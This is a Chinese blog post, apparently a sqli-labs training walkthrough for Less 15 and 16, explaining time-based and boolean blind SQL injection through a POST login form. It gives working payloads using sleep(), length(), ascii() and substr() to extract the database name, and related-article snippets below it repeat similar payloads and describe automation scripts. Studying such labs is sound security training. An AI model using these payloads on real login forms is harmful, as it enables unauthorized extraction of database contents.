15、延时布尔盲注(Post)

最新推荐文章于 2024-05-18 16:10:33 发布
最新推荐文章于 2024-05-18 16:10:33 发布
阅读量480 收藏
点赞数
分类专栏: 小课堂 文章标签: sqli-labs post 延迟 布尔 盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/103384639
版权

环境sqli-labs

less 15

1、首先我们抓包
在这里插入图片描述

2、测试注入
在 username 输入 1’ or 1=1#
在 password 输入 任意
所以用单引号闭合

3、我们构造语句
uname=admin’ and (select (if(length(database())>=8,sleep(5),null)))-- &passwd=2&submit=Submit
如果数据库的长度大于等于8多停留5秒,如果小于8什么都不操作
在这里插入图片描述
uname=admin’ and If(ascii(substr(database(),1,1))=115,sleep(1),sleep(5))#&passwd=11&submit=Submit
如果第一位是‘s’是多停留1秒,如果不是多停留5秒
uname=admin’and If(left(database(),1)=‘s’,1,sleep(5))#&passwd=11&submit=Submit

less 16

闭合是双引号和小括号(")),其他都一样

禁止非法,后果自负

欢迎关注公众号:
在这里插入图片描述

web安全工具库
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入之布尔盲注延时盲注以及原理
maluxiao123的博客
03-30 1227
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入。 1.布尔盲注 我们知道页面有回显可以确定回显位时可以进行回显注入,而没有回显的话,有sql报错页面可以使用报错注入,而一般设计完善的网站是会将sql报错的内容给屏蔽掉的。但是我们能判断页面是报错了,就算页面没有报错内容我们同样是有办法的,这时候我们可以使用盲注的方式来进行注入。 比如
SQL注入--盲注(布尔延时)
weixin_44940180的博客
08-07 1155
布尔延时盲注的区别 首先,使用二者的前提是,在参数错误的情况下(例如:1’)不会返回报错信息 布尔盲注:在正确与错误参数下,页面返回的信息有所不同 延时盲注:不论输入正确或错误参数,页面没有明显区别 时间盲注更像是布尔盲注的升级,布尔盲注的时候比较直观的变化 所以这个时候基于时间的盲注,也就是在基于布尔盲注上结合if判断和sleep()或benchmark()函数来得到一个时间上的变换延迟的参照,也就可以让我们进行一些判断 盲注常使用的函数 length():确定字符长度 ascii():确定某个字
基于post方法的sql布尔盲注模板
qq_37301470的博客
11-05 255
#记录下bugku中的一道布尔盲注题目“sql注入” import requests as req #Postbool盲注 #过滤了','没法用mid,substr,left 截取 试试substr(()from()for()) url="http://114.67.246.176:17306/" #bugku项目的url地址 s=req.session() #创建session对象 select="database()" select2="select group_concat(table_na
sqli-labs通关(1-20)
weixin_57827781的博客
05-18 1423
较为详细的介绍了sqli-labs靶场的操作以及实验过程,更好的学习sql注入
sql注入_1-4_post盲注
weixin_44110913的博客
12-04 1409
sql注入_1-4_post盲注 一.post盲注概念 1.首先post盲注和get盲注一样,只是不会拼接到url中 2.post请求会向指定资源提交数据,请求服务器进行处理,如,表单提交,文件上传等,请求数据会包含在请求体中 3.使用post方法时,查询字符在post信息中单独存在,和http请求一起发送到服务器 二.实验 这里我们使用sqli less-15实验基于post时间和布尔 先...
POST基于时间和布尔盲注
qq_43776408的博客
06-10 1001
HTTP POST介绍 也就是说POST提交的数据是在HTTP请求中 其实二者并没有区别 上图的倒数第二行是目的地址 最后一行是你要传递的参数的值 POST基于时间的盲注 这个之前做过 我们使用Less-15为例 原sql语句为 select * from admin where username=‘name’ and password=‘pw’ limit 0,1 所以你在写的时候需要name‘ 语句 – 后面那个–用于注释掉原sql语句的username后的name后的单引号 然后点击go,你会发
STC15系列万能delay延时函数.zip
03-08
STC15系列万能delay延时。为了方便51单片机在不同晶振频率下,延时函数能正常使用而打包的延时函数。改变频率后只需改变一下宏定义即可。 delay.h #ifndef _DELAY_H #define _DELAY_H //注意时钟频率设置...
用于sql延时盲注的脚本,比较初级
03-22
主要是通过使用Time.time()函数获取时间戳,然后对比发送请求后的时间戳,如果差距为延时设置的时间则表明符合条件,通过字典搜索该ASCII码对应的字符然后插入到输出的字符串中。 程序中使用时主要修改url,最终输出...
SQL盲注利用工具
11-15
4. **布尔盲注**:通过发送一系列可能导致不同结果的查询(例如,导致错误或不产生错误),然后分析应用程序的响应来推断信息。如果应用程序在处理错误时行为不同,那么攻击者可以利用这一点来获取信息。 5. **排序...
sql盲注检测的简单脚本.zip
03-10
时间基盲注是通过判断查询执行时间来确定结果,比如注入一个延时操作,看系统响应时间是否改变。布尔盲注则依赖于系统的返回状态,例如,通过观察“存在”或“不存在”的提示信息。 3. **检测方法**: - **异常...
Oracle用延时存过SLEEP
最新发布
06-20
调用 SLEEP(5) --代表延时5秒继续执行
布尔盲注python脚本.zip
12-28
GET和POSTpython脚本
(手工)【sqli-labs15-16】POST注入:布尔/时间盲注
07-07 988
SQL-POST布尔/时间盲注
两种CTF中特殊盲注的总结
蚁景网安学院
02-04 932
知识点实操概要MySQL注入中,3种盲注方式:基于布尔盲注、基于时间的盲注、基于报错的盲注。以此掌握盲注原理!链接指路:https://www.hetianlab.com/expc.do...
POST基于时间和布尔盲注
qq_60876907的博客
07-19 258
命令:uname=admin' and (select if (length(datebase()>5,sleep(5),null))) -- &passwd=admin&submit=Submit。存在注入点POST提交的参数 + and if (length(datebase())>5,sleep(5),null).如果执行的时间页面响应时间大于5 秒,肯定存在注入点,并且对应的SQL 语句执行。1,在存在注入点POST提交的参数后加入 if 判断正确或者错误的语句。2,POST基于时间盲注
SQL注入篇 盲注总汇
4ct10n
10-15 7207
最近看了一些盲注习题,在这里想总结一下吧。盲注其实可以代替任何注入,但基本的注入比盲注简单。在这里我先解析几道盲注的习题。 1. JSOJ的题目Simple Injection 1. 首先用wvs扫描器扫描网站 发现了sql盲注漏洞 并且是sleep注入 2. 利用给出的payload初步尝试/*'XOR(if(1,sleep(2),0))OR'*/ 确实有延迟效果,那么下面就是写代码了
SQL 盲注GET /POST布尔延时Python脚本
小锤队长的博客
08-09 4273
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql注入之 GET传参 之 布尔: import requests result = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...
POST基于时间与布尔盲注
LoveStarbucks的博客
12-31 1564
POST基于时间与布尔盲注 1.HTTP POST介绍 POST发送数据到服务器中,请求服务器处理(表单数据提交、文件上传) POST可能会创建新的资源或者修改现有资源 2.POST基于时间的盲注 在存在注入点POST提交的参数后加and if(length(database())>5,sleep(5),null) 如果执行的页面响应时间大于5秒,那么肯定就存在注入,并且对应的SQL语句执行...
时间延迟注入 py脚本
weixin_42819368的博客
04-23 499
import requests import string url = "http://172.16.88.33/Less-5/" ##url = raw_input("Input url :") def sql_sleep(url): try: res = requests.get(url,timeout=3) return res.text except Exception as ...
ctffhub 布尔盲注
08-25
布尔盲注是一种注入技术,与普通注入的区别在于返回的结果只是查询是否成功的布尔值,而不是实际的查询结果。这意味着我们需要通过盲猜和试错来进行注入。通常,由于只有返回的布尔值,查询语句会比较复杂,所以我们会使用脚本来进行穷举和试错。在布尔盲注中,我们可以构造特殊的查询语句,例如通过if语句来进行判断。例如,在CTFHUB的布尔盲注中,我们可以输入 if(2>1,sleep(5),1),来判断条件是否成立。根据返回结果的延时,我们可以判断出输入的是否正确执行。 所以,对于CTFHUB的布尔盲注,可以按照给定的payload进行排序,然后将结果提交即可。 总之,布尔盲注是一种需要通过盲猜和试错的注入技术,它只返回查询是否成功的布尔值,而不是实际的查询结果。在进行布尔盲注时,我们可以使用特殊的查询语句和延时函数来判断输入是否正确执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [SQL注入:布尔盲注和时间盲注——CTFHUB 使用Burpsuite进行半自动注入](https://blog.csdn.net/PigletTT/article/details/118640467)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写](https://blog.csdn.net/Xxy605/article/details/109750292)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值